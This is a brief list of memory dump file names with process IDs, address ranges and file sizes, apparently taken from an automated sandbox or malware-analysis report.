memory/576-2-0x00007FFC30470000-0x00007FFC30AA7000-memory.dmpFilesize
6.2MB
-
memory/812-14-0x0000000000FB0000-0x0000000000FD0000-memory.dmpFilesize
128KB
-
memory/812-13-0x0000000000000000-mapping.dmp
-
memory/2996-5-0x00007FFC297D0000-0x00007FFC2A1BC000-memory.dmpFilesize
9.9MB
-
memory/2996-7-0x00000226FCF80000-0x00000226FCF81000-memory.dmpFilesize
4KB
-
memory/2996-6-0x00000226E4CA0000-0x00000226E4CA1000-memory.dmpFilesize
4KB
-
memory/2996-4-0x0000000000000000-mapping.dmp
-
memory/3584-3-0x0000000000000000-mapping.dmp
-
memory/3680-10-0x0000000000000000-mapping.dmp
-
memory/3680-12-0x0000000004760000-0x0000000004780000-memory.dmpFilesize
128KB
-
memory/4060-8-0x0000000000000000-mapping.dmp